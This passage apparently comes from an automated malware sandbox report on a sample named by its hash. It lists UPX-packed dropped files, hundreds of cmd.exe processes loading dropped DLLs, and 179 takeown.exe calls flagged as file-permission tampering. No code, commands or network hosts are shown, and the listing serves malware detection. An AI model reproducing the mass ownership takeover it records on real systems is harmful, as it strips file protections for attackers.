behavioral1/files/0x00030000000131b4-826.dat upx behavioral1/files/0x00030000000131b4-831.dat upx behavioral1/files/0x00030000000131b4-833.dat upx behavioral1/files/0x00030000000131b4-834.dat upx behavioral1/files/0x00030000000131b4-836.dat upx behavioral1/files/0x00030000000131b4-841.dat upx behavioral1/files/0x00030000000131b4-843.dat upx behavioral1/files/0x00030000000131b4-844.dat upx behavioral1/files/0x00030000000131b4-846.dat upx behavioral1/files/0x00030000000131b4-851.dat upx behavioral1/files/0x00030000000131b4-853.dat upx behavioral1/files/0x00030000000131b4-854.dat upx behavioral1/files/0x00030000000131b4-856.dat upx behavioral1/files/0x00030000000131b4-861.dat upx behavioral1/files/0x00030000000131b4-863.dat upx behavioral1/files/0x00030000000131b4-864.dat upx behavioral1/files/0x00030000000131b4-866.dat upx behavioral1/files/0x00030000000131b4-871.dat upx behavioral1/files/0x00030000000131b4-873.dat upx behavioral1/files/0x00030000000131b4-874.dat upx behavioral1/files/0x00030000000131b4-876.dat upx behavioral1/files/0x00030000000131b4-881.dat upx behavioral1/files/0x00030000000131b4-883.dat upx behavioral1/files/0x00030000000131b4-884.dat upx behavioral1/files/0x00030000000131b4-886.dat upx behavioral1/files/0x00030000000131b4-891.dat upx behavioral1/files/0x00030000000131b4-893.dat upx behavioral1/files/0x00030000000131b4-894.dat upx behavioral1/files/0x00030000000131b4-896.dat upx behavioral1/files/0x00030000000131b4-901.dat upx behavioral1/files/0x00030000000131b4-903.dat upx behavioral1/files/0x00030000000131b4-904.dat upx behavioral1/files/0x00030000000131b4-906.dat upx behavioral1/files/0x00030000000131b4-911.dat upx behavioral1/files/0x00030000000131b4-913.dat upx behavioral1/files/0x00030000000131b4-914.dat upx behavioral1/files/0x00030000000131b4-916.dat upx behavioral1/files/0x00030000000131b4-921.dat upx behavioral1/files/0x00030000000131b4-923.dat upx behavioral1/files/0x00030000000131b4-924.dat upx behavioral1/files/0x00030000000131b4-926.dat upx behavioral1/files/0x00030000000131b4-931.dat upx behavioral1/files/0x00030000000131b4-933.dat upx behavioral1/files/0x00030000000131b4-934.dat upx behavioral1/files/0x00030000000131b4-936.dat upx behavioral1/files/0x00030000000131b4-941.dat upx behavioral1/files/0x00030000000131b4-943.dat upx behavioral1/files/0x00030000000131b4-944.dat upx behavioral1/files/0x00030000000131b4-946.dat upx behavioral1/files/0x00030000000131b4-951.dat upx behavioral1/files/0x00030000000131b4-953.dat upx behavioral1/files/0x00030000000131b4-954.dat upx behavioral1/files/0x00030000000131b4-956.dat upx behavioral1/files/0x00030000000131b4-961.dat upx behavioral1/files/0x00030000000131b4-963.dat upx behavioral1/files/0x00030000000131b4-964.dat upx behavioral1/files/0x00030000000131b4-966.dat upx behavioral1/files/0x00030000000131b4-971.dat upx behavioral1/files/0x00030000000131b4-973.dat upx behavioral1/files/0x00030000000131b4-974.dat upx behavioral1/files/0x00030000000131b4-976.dat upx behavioral1/files/0x00030000000131b4-981.dat upx behavioral1/files/0x00030000000131b4-983.dat upx behavioral1/files/0x00030000000131b4-984.dat upx behavioral1/files/0x00030000000131b4-986.dat upx behavioral1/files/0x00030000000131b4-991.dat upx behavioral1/files/0x00030000000131b4-993.dat upx behavioral1/files/0x00030000000131b4-994.dat upx behavioral1/files/0x00030000000131b4-996.dat upx behavioral1/files/0x00030000000131b4-1001.dat upx behavioral1/files/0x00030000000131b4-1003.dat upx behavioral1/files/0x00030000000131b4-1004.dat upx behavioral1/files/0x00030000000131b4-1006.dat upx behavioral1/files/0x00030000000131b4-1011.dat upx behavioral1/files/0x00030000000131b4-1013.dat upx behavioral1/files/0x00030000000131b4-1014.dat upx behavioral1/files/0x00030000000131b4-1016.dat upx behavioral1/files/0x00030000000131b4-1021.dat upx behavioral1/files/0x00030000000131b4-1023.dat upx behavioral1/files/0x00030000000131b4-1024.dat upx behavioral1/files/0x00030000000131b4-1026.dat upx behavioral1/files/0x00030000000131b4-1031.dat upx behavioral1/files/0x00030000000131b4-1033.dat upx behavioral1/files/0x00030000000131b4-1034.dat upx behavioral1/files/0x00030000000131b4-1036.dat upx behavioral1/files/0x00030000000131b4-1041.dat upx behavioral1/files/0x00030000000131b4-1043.dat upx behavioral1/files/0x00030000000131b4-1044.dat upx behavioral1/files/0x00030000000131b4-1046.dat upx behavioral1/files/0x00030000000131b4-1051.dat upx behavioral1/files/0x00030000000131b4-1053.dat upx behavioral1/files/0x00030000000131b4-1054.dat upx behavioral1/files/0x00030000000131b4-1056.dat upx behavioral1/files/0x00030000000131b4-1061.dat upx behavioral1/files/0x00030000000131b4-1063.dat upx behavioral1/files/0x00030000000131b4-1064.dat upx behavioral1/files/0x00030000000131b4-1066.dat upx behavioral1/files/0x00030000000131b4-1071.dat upx behavioral1/files/0x00030000000131b4-1073.dat upx behavioral1/files/0x00030000000131b4-1074.dat upx behavioral1/files/0x00030000000131b4-1076.dat upx behavioral1/files/0x00030000000131b4-1081.dat upx behavioral1/files/0x00030000000131b4-1083.dat upx behavioral1/files/0x00030000000131b4-1084.dat upx behavioral1/files/0x00030000000131b4-1086.dat upx behavioral1/files/0x00030000000131b4-1091.dat upx behavioral1/files/0x00030000000131b4-1093.dat upx behavioral1/files/0x00030000000131b4-1094.dat upx behavioral1/files/0x00030000000131b4-1096.dat upx behavioral1/files/0x00030000000131b4-1101.dat upx behavioral1/files/0x00030000000131b4-1103.dat upx behavioral1/files/0x00030000000131b4-1104.dat upx behavioral1/files/0x00030000000131b4-1106.dat upx behavioral1/files/0x00030000000131b4-1111.dat upx behavioral1/files/0x00030000000131b4-1113.dat upx behavioral1/files/0x00030000000131b4-1114.dat upx behavioral1/files/0x00030000000131b4-1116.dat upx behavioral1/files/0x00030000000131b4-1121.dat upx behavioral1/files/0x00030000000131b4-1123.dat upx behavioral1/files/0x00030000000131b4-1124.dat upx behavioral1/files/0x00030000000131b4-1126.dat upx behavioral1/files/0x00030000000131b4-1131.dat upx behavioral1/files/0x00030000000131b4-1133.dat upx behavioral1/files/0x00030000000131b4-1134.dat upx behavioral1/files/0x00030000000131b4-1136.dat upx behavioral1/files/0x00030000000131b4-1141.dat upx behavioral1/files/0x00030000000131b4-1143.dat upx behavioral1/files/0x00030000000131b4-1144.dat upx behavioral1/files/0x00030000000131b4-1146.dat upx behavioral1/files/0x00030000000131b4-1151.dat upx behavioral1/files/0x00030000000131b4-1153.dat upx behavioral1/files/0x00030000000131b4-1154.dat upx behavioral1/files/0x00030000000131b4-1156.dat upx behavioral1/files/0x00030000000131b4-1161.dat upx behavioral1/files/0x00030000000131b4-1163.dat upx behavioral1/files/0x00030000000131b4-1164.dat upx behavioral1/files/0x00030000000131b4-1166.dat upx behavioral1/files/0x00030000000131b4-1171.dat upx behavioral1/files/0x00030000000131b4-1173.dat upx behavioral1/files/0x00030000000131b4-1174.dat upx behavioral1/files/0x00030000000131b4-1176.dat upx behavioral1/files/0x00030000000131b4-1181.dat upx behavioral1/files/0x00030000000131b4-1183.dat upx behavioral1/files/0x00030000000131b4-1184.dat upx behavioral1/files/0x00030000000131b4-1186.dat upx behavioral1/files/0x00030000000131b4-1191.dat upx behavioral1/files/0x00030000000131b4-1193.dat upx behavioral1/files/0x00030000000131b4-1194.dat upx behavioral1/files/0x00030000000131b4-1196.dat upx behavioral1/files/0x00030000000131b4-1201.dat upx behavioral1/files/0x00030000000131b4-1203.dat upx behavioral1/files/0x00030000000131b4-1204.dat upx behavioral1/files/0x00030000000131b4-1206.dat upx behavioral1/files/0x00030000000131b4-1211.dat upx behavioral1/files/0x00030000000131b4-1213.dat upx behavioral1/files/0x00030000000131b4-1214.dat upx behavioral1/files/0x00030000000131b4-1216.dat upx behavioral1/files/0x00030000000131b4-1221.dat upx behavioral1/files/0x00030000000131b4-1223.dat upx behavioral1/files/0x00030000000131b4-1224.dat upx behavioral1/files/0x00030000000131b4-1226.dat upx behavioral1/files/0x00030000000131b4-1231.dat upx behavioral1/files/0x00030000000131b4-1233.dat upx behavioral1/files/0x00030000000131b4-1234.dat upx behavioral1/files/0x00030000000131b4-1236.dat upx behavioral1/files/0x00030000000131b4-1241.dat upx behavioral1/files/0x00030000000131b4-1243.dat upx behavioral1/files/0x00030000000131b4-1244.dat upx behavioral1/files/0x00030000000131b4-1246.dat upx behavioral1/files/0x00030000000131b4-1251.dat upx behavioral1/files/0x00030000000131b4-1253.dat upx behavioral1/files/0x00030000000131b4-1254.dat upx behavioral1/files/0x00030000000131b4-1256.dat upx behavioral1/files/0x00030000000131b4-1261.dat upx behavioral1/files/0x00030000000131b4-1263.dat upx behavioral1/files/0x00030000000131b4-1264.dat upx behavioral1/files/0x00030000000131b4-1266.dat upx behavioral1/files/0x00030000000131b4-1271.dat upx behavioral1/files/0x00030000000131b4-1273.dat upx behavioral1/files/0x00030000000131b4-1274.dat upx behavioral1/files/0x00030000000131b4-1276.dat upx behavioral1/files/0x00030000000131b4-1281.dat upx behavioral1/files/0x00030000000131b4-1283.dat upx behavioral1/files/0x00030000000131b4-1284.dat upx behavioral1/files/0x00030000000131b4-1286.dat upx behavioral1/files/0x00030000000131b4-1291.dat upx behavioral1/files/0x00030000000131b4-1293.dat upx behavioral1/files/0x00030000000131b4-1294.dat upx behavioral1/files/0x00030000000131b4-1296.dat upx behavioral1/files/0x00030000000131b4-1301.dat upx behavioral1/files/0x00030000000131b4-1303.dat upx behavioral1/files/0x00030000000131b4-1304.dat upx behavioral1/files/0x00030000000131b4-1306.dat upx behavioral1/files/0x00030000000131b4-1311.dat upx behavioral1/files/0x00030000000131b4-1313.dat upx behavioral1/files/0x00030000000131b4-1314.dat upx behavioral1/files/0x00030000000131b4-1316.dat upx behavioral1/files/0x00030000000131b4-1321.dat upx behavioral1/files/0x00030000000131b4-1323.dat upx behavioral1/files/0x00030000000131b4-1324.dat upx behavioral1/files/0x00030000000131b4-1326.dat upx behavioral1/files/0x00030000000131b4-1331.dat upx behavioral1/files/0x00030000000131b4-1333.dat upx behavioral1/files/0x00030000000131b4-1334.dat upx behavioral1/files/0x00030000000131b4-1336.dat upx behavioral1/files/0x00030000000131b4-1341.dat upx behavioral1/files/0x00030000000131b4-1343.dat upx behavioral1/files/0x00030000000131b4-1344.dat upx behavioral1/files/0x00030000000131b4-1346.dat upx behavioral1/files/0x00030000000131b4-1351.dat upx behavioral1/files/0x00030000000131b4-1353.dat upx behavioral1/files/0x00030000000131b4-1354.dat upx behavioral1/files/0x00030000000131b4-1356.dat upx behavioral1/files/0x00030000000131b4-1361.dat upx behavioral1/files/0x00030000000131b4-1363.dat upx behavioral1/files/0x00030000000131b4-1364.dat upx behavioral1/files/0x00030000000131b4-1366.dat upx behavioral1/files/0x00030000000131b4-1371.dat upx behavioral1/files/0x00030000000131b4-1373.dat upx behavioral1/files/0x00030000000131b4-1374.dat upx behavioral1/files/0x00030000000131b4-1376.dat upx behavioral1/files/0x00030000000131b4-1381.dat upx behavioral1/files/0x00030000000131b4-1383.dat upx behavioral1/files/0x00030000000131b4-1384.dat upx behavioral1/files/0x00030000000131b4-1386.dat upx behavioral1/files/0x00030000000131b4-1391.dat upx behavioral1/files/0x00030000000131b4-1393.dat upx behavioral1/files/0x00030000000131b4-1394.dat upx behavioral1/files/0x00030000000131b4-1396.dat upx behavioral1/files/0x00030000000131b4-1401.dat upx behavioral1/files/0x00030000000131b4-1403.dat upx behavioral1/files/0x00030000000131b4-1404.dat upx behavioral1/files/0x00030000000131b4-1406.dat upx behavioral1/files/0x00030000000131b4-1411.dat upx behavioral1/files/0x00030000000131b4-1413.dat upx behavioral1/files/0x00030000000131b4-1414.dat upx behavioral1/files/0x00030000000131b4-1416.dat upx behavioral1/files/0x00030000000131b4-1421.dat upx behavioral1/files/0x00030000000131b4-1423.dat upx behavioral1/files/0x00030000000131b4-1424.dat upx behavioral1/files/0x00030000000131b4-1426.dat upx behavioral1/files/0x00030000000131b4-1431.dat upx behavioral1/files/0x00030000000131b4-1433.dat upx behavioral1/files/0x00030000000131b4-1434.dat upx behavioral1/files/0x00030000000131b4-1436.dat upx behavioral1/files/0x00030000000131b4-1441.dat upx behavioral1/files/0x00030000000131b4-1443.dat upx behavioral1/files/0x00030000000131b4-1444.dat upx behavioral1/files/0x00030000000131b4-1446.dat upx behavioral1/files/0x00030000000131b4-1451.dat upx behavioral1/files/0x00030000000131b4-1453.dat upx behavioral1/files/0x00030000000131b4-1454.dat upx behavioral1/files/0x00030000000131b4-1456.dat upx behavioral1/files/0x00030000000131b4-1461.dat upx behavioral1/files/0x00030000000131b4-1463.dat upx behavioral1/files/0x00030000000131b4-1464.dat upx behavioral1/files/0x00030000000131b4-1466.dat upx behavioral1/files/0x00030000000131b4-1471.dat upx behavioral1/files/0x00030000000131b4-1473.dat upx behavioral1/files/0x00030000000131b4-1474.dat upx behavioral1/files/0x00030000000131b4-1476.dat upx behavioral1/files/0x00030000000131b4-1481.dat upx behavioral1/files/0x00030000000131b4-1483.dat upx behavioral1/files/0x00030000000131b4-1484.dat upx behavioral1/files/0x00030000000131b4-1486.dat upx behavioral1/files/0x00030000000131b4-1491.dat upx behavioral1/files/0x00030000000131b4-1493.dat upx behavioral1/files/0x00030000000131b4-1494.dat upx behavioral1/files/0x00030000000131b4-1496.dat upx behavioral1/files/0x00030000000131b4-1501.dat upx behavioral1/files/0x00030000000131b4-1503.dat upx behavioral1/files/0x00030000000131b4-1504.dat upx behavioral1/files/0x00030000000131b4-1506.dat upx behavioral1/files/0x00030000000131b4-1511.dat upx behavioral1/files/0x00030000000131b4-1513.dat upx behavioral1/files/0x00030000000131b4-1514.dat upx behavioral1/files/0x00030000000131b4-1516.dat upx behavioral1/files/0x00030000000131b4-1521.dat upx behavioral1/files/0x00030000000131b4-1523.dat upx behavioral1/files/0x00030000000131b4-1524.dat upx behavioral1/files/0x00030000000131b4-1526.dat upx behavioral1/files/0x00030000000131b4-1531.dat upx behavioral1/files/0x00030000000131b4-1533.dat upx behavioral1/files/0x00030000000131b4-1534.dat upx behavioral1/files/0x00030000000131b4-1536.dat upx behavioral1/files/0x00030000000131b4-1541.dat upx behavioral1/files/0x00030000000131b4-1543.dat upx behavioral1/files/0x00030000000131b4-1544.dat upx behavioral1/files/0x00030000000131b4-1546.dat upx behavioral1/files/0x00030000000131b4-1551.dat upx behavioral1/files/0x00030000000131b4-1553.dat upx behavioral1/files/0x00030000000131b4-1554.dat upx behavioral1/files/0x00030000000131b4-1556.dat upx behavioral1/files/0x00030000000131b4-1561.dat upx behavioral1/files/0x00030000000131b4-1563.dat upx behavioral1/files/0x00030000000131b4-1564.dat upx behavioral1/files/0x00030000000131b4-1566.dat upx behavioral1/files/0x00030000000131b4-1571.dat upx behavioral1/files/0x00030000000131b4-1573.dat upx behavioral1/files/0x00030000000131b4-1574.dat upx behavioral1/files/0x00030000000131b4-1576.dat upx behavioral1/files/0x00030000000131b4-1581.dat upx behavioral1/files/0x00030000000131b4-1583.dat upx behavioral1/files/0x00030000000131b4-1584.dat upx behavioral1/files/0x00030000000131b4-1586.dat upx behavioral1/files/0x00030000000131b4-1591.dat upx behavioral1/files/0x00030000000131b4-1593.dat upx behavioral1/files/0x00030000000131b4-1594.dat upx behavioral1/files/0x00030000000131b4-1596.dat upx behavioral1/files/0x00030000000131b4-1601.dat upx behavioral1/files/0x00030000000131b4-1603.dat upx behavioral1/files/0x00030000000131b4-1604.dat upx behavioral1/files/0x00030000000131b4-1606.dat upx behavioral1/files/0x00030000000131b4-1611.dat upx behavioral1/files/0x00030000000131b4-1613.dat upx behavioral1/files/0x00030000000131b4-1614.dat upx behavioral1/files/0x00030000000131b4-1616.dat upx behavioral1/files/0x00030000000131b4-1621.dat upx behavioral1/files/0x00030000000131b4-1623.dat upx behavioral1/files/0x00030000000131b4-1624.dat upx behavioral1/files/0x00030000000131b4-1626.dat upx behavioral1/files/0x00030000000131b4-1631.dat upx behavioral1/files/0x00030000000131b4-1633.dat upx behavioral1/files/0x00030000000131b4-1634.dat upx behavioral1/files/0x00030000000131b4-1636.dat upx behavioral1/files/0x00030000000131b4-1641.dat upx behavioral1/files/0x00030000000131b4-1643.dat upx behavioral1/files/0x00030000000131b4-1644.dat upx behavioral1/files/0x00030000000131b4-1646.dat upx behavioral1/files/0x00030000000131b4-1651.dat upx behavioral1/files/0x00030000000131b4-1653.dat upx behavioral1/files/0x00030000000131b4-1654.dat upx behavioral1/files/0x00030000000131b4-1656.dat upx behavioral1/files/0x00030000000131b4-1661.dat upx behavioral1/files/0x00030000000131b4-1663.dat upx behavioral1/files/0x00030000000131b4-1664.dat upx behavioral1/files/0x00030000000131b4-1666.dat upx behavioral1/files/0x00030000000131b4-1671.dat upx behavioral1/files/0x00030000000131b4-1673.dat upx behavioral1/files/0x00030000000131b4-1674.dat upx behavioral1/files/0x00030000000131b4-1676.dat upx behavioral1/files/0x00030000000131b4-1681.dat upx behavioral1/files/0x00030000000131b4-1683.dat upx behavioral1/files/0x00030000000131b4-1684.dat upx behavioral1/files/0x00030000000131b4-1686.dat upx behavioral1/files/0x00030000000131b4-1691.dat upx behavioral1/files/0x00030000000131b4-1693.dat upx behavioral1/files/0x00030000000131b4-1694.dat upx behavioral1/files/0x00030000000131b4-1696.dat upx behavioral1/files/0x00030000000131b4-1701.dat upx behavioral1/files/0x00030000000131b4-1703.dat upx behavioral1/files/0x00030000000131b4-1704.dat upx behavioral1/files/0x00030000000131b4-1706.dat upx behavioral1/files/0x00030000000131b4-1711.dat upx behavioral1/files/0x00030000000131b4-1713.dat upx behavioral1/files/0x00030000000131b4-1714.dat upx behavioral1/files/0x00030000000131b4-1716.dat upx behavioral1/files/0x00030000000131b4-1721.dat upx behavioral1/files/0x00030000000131b4-1723.dat upx behavioral1/files/0x00030000000131b4-1724.dat upx behavioral1/files/0x00030000000131b4-1726.dat upx behavioral1/files/0x00030000000131b4-1731.dat upx behavioral1/files/0x00030000000131b4-1733.dat upx behavioral1/files/0x00030000000131b4-1734.dat upx behavioral1/files/0x00030000000131b4-1736.dat upx behavioral1/files/0x00030000000131b4-1741.dat upx behavioral1/files/0x00030000000131b4-1743.dat upx behavioral1/files/0x00030000000131b4-1744.dat upx behavioral1/files/0x00030000000131b4-1746.dat upx behavioral1/files/0x00030000000131b4-1751.dat upx behavioral1/files/0x00030000000131b4-1753.dat upx behavioral1/files/0x00030000000131b4-1754.dat upx behavioral1/files/0x00030000000131b4-1756.dat upx behavioral1/files/0x00030000000131b4-1761.dat upx behavioral1/files/0x00030000000131b4-1763.dat upx behavioral1/files/0x00030000000131b4-1764.dat upx behavioral1/files/0x00030000000131b4-1766.dat upx behavioral1/files/0x00030000000131b4-1771.dat upx behavioral1/files/0x00030000000131b4-1773.dat upx behavioral1/files/0x00030000000131b4-1774.dat upx behavioral1/files/0x00030000000131b4-1776.dat upx behavioral1/files/0x00030000000131b4-1781.dat upx behavioral1/files/0x00030000000131b4-1783.dat upx behavioral1/files/0x00030000000131b4-1784.dat upx behavioral1/files/0x00030000000131b4-1786.dat upx behavioral1/files/0x00030000000131b4-1791.dat upx behavioral1/files/0x00030000000131b4-1793.dat upx behavioral1/files/0x00030000000131b4-1794.dat upx behavioral1/files/0x00030000000131b4-1796.dat upx behavioral1/files/0x00030000000131b4-1801.dat upx behavioral1/files/0x00030000000131b4-1803.dat upx behavioral1/files/0x00030000000131b4-1804.dat upx behavioral1/files/0x00030000000131b4-1806.dat upx behavioral1/files/0x00030000000131b4-1811.dat upx behavioral1/files/0x00030000000131b4-1813.dat upx behavioral1/files/0x00030000000131b4-1814.dat upx behavioral1/files/0x00030000000131b4-1816.dat upx -
Loads dropped DLL 360 IoCs
pid Process 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 892 cmd.exe 1964 IhR8G8EE.exe 1988 cmd.exe 1468 cmd.exe 1876 cmd.exe 1344 cmd.exe 1236 cmd.exe 596 cmd.exe 972 cmd.exe 296 cmd.exe 1376 cmd.exe 1876 cmd.exe 1984 cmd.exe 680 cmd.exe 1752 cmd.exe 1816 cmd.exe 296 cmd.exe 1892 cmd.exe 1236 cmd.exe 972 cmd.exe 1564 cmd.exe 1840 cmd.exe 932 cmd.exe 1908 cmd.exe 296 cmd.exe 848 cmd.exe 1876 cmd.exe 1512 cmd.exe 1312 cmd.exe 232 cmd.exe 1752 cmd.exe 972 cmd.exe 524 cmd.exe 1860 cmd.exe 1804 cmd.exe 1984 cmd.exe 680 cmd.exe 208 cmd.exe 1804 cmd.exe 932 cmd.exe 1344 cmd.exe 468 cmd.exe 204 cmd.exe 1876 cmd.exe 680 cmd.exe 1936 cmd.exe 1372 cmd.exe 228 cmd.exe 1420 cmd.exe 1096 cmd.exe 1896 cmd.exe 1892 cmd.exe 916 cmd.exe 1580 cmd.exe 1912 cmd.exe 296 cmd.exe 1800 cmd.exe 1816 cmd.exe 1840 cmd.exe 1908 cmd.exe 1376 cmd.exe 524 cmd.exe 972 cmd.exe 468 cmd.exe 1808 cmd.exe 1344 cmd.exe 524 cmd.exe 1984 cmd.exe 468 cmd.exe 1480 cmd.exe 1344 cmd.exe 1936 cmd.exe 1696 cmd.exe 1888 cmd.exe 1404 cmd.exe 1412 cmd.exe 1912 cmd.exe 1168 cmd.exe 1696 cmd.exe 964 cmd.exe 1404 cmd.exe 300 cmd.exe 1912 cmd.exe 928 cmd.exe 1888 cmd.exe 1372 cmd.exe 1404 cmd.exe 296 cmd.exe 944 cmd.exe 1952 cmd.exe 940 cmd.exe 524 cmd.exe 1808 cmd.exe 212 cmd.exe 1772 cmd.exe 896 cmd.exe 756 cmd.exe 1376 cmd.exe 1788 cmd.exe 1412 cmd.exe 216 cmd.exe 1936 cmd.exe 204 cmd.exe 232 cmd.exe 1420 cmd.exe 220 cmd.exe 1372 cmd.exe 1952 cmd.exe 1860 cmd.exe 1260 cmd.exe 1816 cmd.exe 1960 cmd.exe 1876 cmd.exe 1984 cmd.exe 212 cmd.exe 1096 cmd.exe 928 cmd.exe 296 cmd.exe 1876 cmd.exe 380 cmd.exe 1168 cmd.exe 1580 cmd.exe 968 cmd.exe 2016 cmd.exe 1236 cmd.exe 548 cmd.exe 916 cmd.exe 1860 cmd.exe 1128 cmd.exe 1840 cmd.exe 972 cmd.exe 1108 cmd.exe 1564 cmd.exe 756 cmd.exe 216 cmd.exe 1960 cmd.exe 1876 cmd.exe 1752 cmd.exe 1788 cmd.exe 940 cmd.exe 1128 cmd.exe 1512 cmd.exe 972 cmd.exe 1772 cmd.exe 1564 cmd.exe 1096 cmd.exe 216 cmd.exe 1412 cmd.exe 1876 cmd.exe 208 cmd.exe 1788 cmd.exe 1896 cmd.exe 1128 cmd.exe 932 cmd.exe 972 cmd.exe 1888 cmd.exe 1788 cmd.exe 1416 cmd.exe 216 cmd.exe 292 cmd.exe 1876 cmd.exe 280 cmd.exe 1908 cmd.exe 848 cmd.exe 1128 cmd.exe 1820 cmd.exe 1876 cmd.exe 524 cmd.exe 1904 cmd.exe 916 cmd.exe 1808 cmd.exe 1816 cmd.exe 756 cmd.exe 208 cmd.exe 1512 cmd.exe 212 cmd.exe 1808 cmd.exe 1960 cmd.exe 1168 cmd.exe 1752 cmd.exe 1236 cmd.exe 1344 cmd.exe 1952 cmd.exe 1424 cmd.exe 208 cmd.exe 1372 cmd.exe 864 cmd.exe 940 cmd.exe 220 cmd.exe 1404 cmd.exe 1260 cmd.exe 1756 cmd.exe 292 cmd.exe 944 cmd.exe 1108 cmd.exe 1960 cmd.exe 916 cmd.exe 972 cmd.exe 380 cmd.exe 1080 cmd.exe 756 cmd.exe 216 cmd.exe 928 cmd.exe 1096 cmd.exe 1912 cmd.exe 1376 cmd.exe 300 cmd.exe 1412 cmd.exe 848 cmd.exe 1468 cmd.exe 864 cmd.exe 900 cmd.exe 1756 cmd.exe 1772 cmd.exe 212 cmd.exe 1860 cmd.exe 1808 cmd.exe 1080 cmd.exe 972 cmd.exe 964 cmd.exe 1236 cmd.exe 1028 cmd.exe 1528 cmd.exe 292 cmd.exe 1788 cmd.exe 1108 cmd.exe 1376 cmd.exe 1344 cmd.exe 232 cmd.exe 1896 cmd.exe 1788 cmd.exe 1780 cmd.exe 1096 cmd.exe 928 cmd.exe 232 cmd.exe 1080 cmd.exe 1788 cmd.exe 1904 cmd.exe 1096 cmd.exe 848 cmd.exe 232 cmd.exe 864 cmd.exe 1788 cmd.exe 1756 cmd.exe 1096 cmd.exe 1028 cmd.exe 232 cmd.exe 932 cmd.exe 1788 cmd.exe 1888 cmd.exe 1096 cmd.exe 1344 cmd.exe 232 cmd.exe 1948 cmd.exe 1260 cmd.exe 1952 cmd.exe 1204 cmd.exe 1580 cmd.exe 228 cmd.exe 896 cmd.exe 928 cmd.exe 916 cmd.exe 292 cmd.exe 1960 cmd.exe 1168 cmd.exe 1424 cmd.exe 1528 cmd.exe 212 cmd.exe 224 cmd.exe 1808 cmd.exe 296 cmd.exe 1324 cmd.exe 1800 cmd.exe 1780 cmd.exe 1816 cmd.exe 1820 cmd.exe 1260 cmd.exe 1080 cmd.exe 1892 cmd.exe 1344 cmd.exe 1788 cmd.exe 900 cmd.exe 1984 cmd.exe 1108 cmd.exe 1468 cmd.exe 972 cmd.exe 220 cmd.exe 1936 cmd.exe 1128 cmd.exe 1912 cmd.exe 224 cmd.exe 468 cmd.exe 236 cmd.exe 524 cmd.exe 1236 cmd.exe 232 cmd.exe 896 cmd.exe 292 cmd.exe 1260 cmd.exe 1168 cmd.exe 2016 cmd.exe 964 cmd.exe 1580 cmd.exe 208 cmd.exe 1888 cmd.exe 1948 cmd.exe 212 cmd.exe 300 cmd.exe 220 cmd.exe 1800 cmd.exe 916 cmd.exe 1904 cmd.exe 1128 cmd.exe 1840 cmd.exe 1808 cmd.exe 1580 cmd.exe 1608 cmd.exe 1324 cmd.exe 280 cmd.exe 972 cmd.exe 1168 cmd.exe 1860 cmd.exe 1080 cmd.exe 1752 cmd.exe 1404 cmd.exe 928 cmd.exe 1888 cmd.exe 896 cmd.exe 212 cmd.exe 1372 cmd.exe 524 cmd.exe 964 cmd.exe 236 cmd.exe 940 cmd.exe 1236 cmd.exe 1204 cmd.exe 1800 cmd.exe 1912 cmd.exe 680 cmd.exe 1860 cmd.exe 1952 cmd.exe 1816 cmd.exe 1788 cmd.exe 292 cmd.exe 1752 cmd.exe 896 cmd.exe 1468 cmd.exe 1984 cmd.exe 484 cmd.exe 964 cmd.exe 212 cmd.exe 1820 cmd.exe 468 cmd.exe 1376 cmd.exe 1904 cmd.exe 900 cmd.exe 1128 cmd.exe 1772 cmd.exe -
Modifies file permissions 1 TTPs 179 IoCs
pid Process 1800 takeown.exe 1912 takeown.exe 1840 takeown.exe 1912 takeown.exe 1372 takeown.exe 1580 takeown.exe 1808 takeown.exe 1312 takeown.exe 1816 takeown.exe 916 takeown.exe 680 takeown.exe 1608 takeown.exe 964 takeown.exe 1896 takeown.exe 380 takeown.exe 1936 takeown.exe 1028 takeown.exe 1800 takeown.exe 1236 takeown.exe 484 takeown.exe 484 takeown.exe 212 takeown.exe 1480 takeown.exe 916 takeown.exe 1344 takeown.exe 1128 takeown.exe 972 takeown.exe 848 takeown.exe 224 takeown.exe 1324 takeown.exe 1888 takeown.exe 1028 takeown.exe 1952 takeown.exe 848 takeown.exe 1888 takeown.exe 944 takeown.exe 1236 takeown.exe 944 takeown.exe 1892 takeown.exe 1372 takeown.exe 1936 takeown.exe 968 takeown.exe 1376 takeown.exe 280 takeown.exe 1860 takeown.exe 1512 takeown.exe 232 takeown.exe 1816 takeown.exe 900 takeown.exe 1096 takeown.exe 1580 takeown.exe 204 takeown.exe 1404 takeown.exe 1468 takeown.exe 928 takeown.exe 1816 takeown.exe 1528 takeown.exe 1804 takeown.exe 232 takeown.exe 1820 takeown.exe 1416 takeown.exe 1512 takeown.exe 972 takeown.exe 1080 takeown.exe 1892 takeown.exe 224 takeown.exe 1908 takeown.exe 1892 takeown.exe 1896 takeown.exe 968 takeown.exe 1804 takeown.exe 1752 takeown.exe 1544 takeown.exe 1168 takeown.exe 1608 takeown.exe 208 takeown.exe 1108 takeown.exe 1840 takeown.exe 1816 takeown.exe 296 takeown.exe 1344 takeown.exe 1876 takeown.exe 928 takeown.exe 900 takeown.exe 972 takeown.exe 232 takeown.exe 940 takeown.exe 1096 takeown.exe 1876 takeown.exe 2016 takeown.exe 848 takeown.exe 900 takeown.exe 1608 takeown.exe 1416 takeown.exe 296 takeown.exe 1756 takeown.exe 1468 takeown.exe 944 takeown.exe 1952 takeown.exe 1860 takeown.exe 680 takeown.exe 928 takeown.exe 968 takeown.exe 1820 takeown.exe 1344 takeown.exe 1096 takeown.exe 1864 takeown.exe 1752 takeown.exe 1952 takeown.exe 896 takeown.exe 1168 takeown.exe 296 takeown.exe 1404 takeown.exe 380 takeown.exe 848 takeown.exe 900 takeown.exe 484 takeown.exe 1772 takeown.exe 1804 takeown.exe 436 takeown.exe 236 takeown.exe 940 takeown.exe 1864 takeown.exe 468 takeown.exe 208 takeown.exe 300 takeown.exe 548 takeown.exe 1096 takeown.exe 1820 takeown.exe 548 takeown.exe 1416 takeown.exe 928 takeown.exe 232 takeown.exe 1528 takeown.exe 1412 takeown.exe 968 takeown.exe 1128 takeown.exe 1528 takeown.exe 756 takeown.exe 280 takeown.exe 1960 takeown.exe 1820 takeown.exe 1428 takeown.exe 1772 takeown.exe 236 takeown.exe 932 takeown.exe 280 takeown.exe 1376 takeown.exe 932 takeown.exe 220 takeown.exe 1772 takeown.exe 1896 takeown.exe 1376 takeown.exe 292 takeown.exe 1952 takeown.exe 228 takeown.exe 216 takeown.exe 300 takeown.exe 1772 takeown.exe 1420 